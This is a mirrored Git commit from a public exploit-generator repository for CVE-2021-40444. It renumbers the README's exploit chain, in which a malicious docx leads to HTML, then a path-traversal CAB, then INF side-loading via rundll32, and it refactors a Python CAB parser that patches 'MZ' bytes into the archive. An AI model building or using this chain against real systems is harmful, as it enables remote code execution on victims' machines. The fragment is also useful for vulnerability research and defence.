mirror of
https://github.com/klezVirus/CVE-2021-40444.git
synced 2024-11-24 22:20:47 +00:00
Minor Edit in Cab Parser
This commit is contained in:
parent
7562cfa66a
commit
53af9514ef
2 changed files with 18 additions and 10 deletions
16
README.md
16
README.md
|
@ -14,15 +14,15 @@ So far, the only valuable resources I've seen to create a fully working generato
|
||||||
|
|
||||||
The above resources outline a lot of the requirements needed to create a full chain. As I do not desire
|
The above resources outline a lot of the requirements needed to create a full chain. As I do not desire
|
||||||
|
|
||||||
### Chain
|
### Exploit Chain
|
||||||
* Docx opened
|
1. Docx opened
|
||||||
* Relationship stored in document.xml.rels points to malicious html
|
2. Relationship stored in document.xml.rels points to malicious html
|
||||||
* IE preview is launched to open the HTML link
|
3. IE preview is launched to open the HTML link
|
||||||
* JScript within the HTML contains an object pointing to a CAB file, and an iframe pointing to an INF file,
|
4. JScript within the HTML contains an object pointing to a CAB file, and an iframe pointing to an INF file,
|
||||||
prefixed with the ".cpl:" directive
|
prefixed with the ".cpl:" directive
|
||||||
* The cab file is opened, the INF file stored in the %TEMP%\Low directory
|
5. The cab file is opened, the INF file stored in the %TEMP%\Low directory
|
||||||
* Due to a Path traversal (ZipSlip) vulnerability in the CAB, it's possible to store the INF in %TEMP%
|
6. Due to a Path traversal (ZipSlip) vulnerability in the CAB, it's possible to store the INF in %TEMP%
|
||||||
* Then, the INF file is opened with the ".cpl:" directive, causing the side-loading of the INF file via rundll32
|
7. Then, the INF file is opened with the ".cpl:" directive, causing the side-loading of the INF file via rundll32
|
||||||
(if this is a DLL)
|
(if this is a DLL)
|
||||||
|
|
||||||
### Overlooked Requirements
|
### Overlooked Requirements
|
||||||
|
|
|
@ -200,10 +200,18 @@ def parse(file):
|
||||||
data = open(file, "rb").read()
|
data = open(file, "rb").read()
|
||||||
cab = Cab(data=data)
|
cab = Cab(data=data)
|
||||||
print(cab.to_string())
|
print(cab.to_string())
|
||||||
|
|
||||||
|
|
||||||
|
def change_e_magic(cab: Cab, value: bytes):
|
||||||
|
if not value or not isinstance(value, bytes) or len(value) != 4:
|
||||||
|
return
|
||||||
new_cab = cab.change_bytes(offset=0x58, size=4, value=b"MZ\x90\x00")
|
new_cab = cab.change_bytes(offset=0x58, size=4, value=b"MZ\x90\x00")
|
||||||
print(Cab(new_cab).to_string())
|
print(Cab(new_cab).to_string())
|
||||||
|
|
||||||
|
|
||||||
|
def save(cab: Cab, file: str):
|
||||||
with open(file, "wb") as out:
|
with open(file, "wb") as out:
|
||||||
out.write(Cab(new_cab).to_bytes())
|
out.write(cab.to_bytes())
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
|
|
Loading…
Reference in a new issue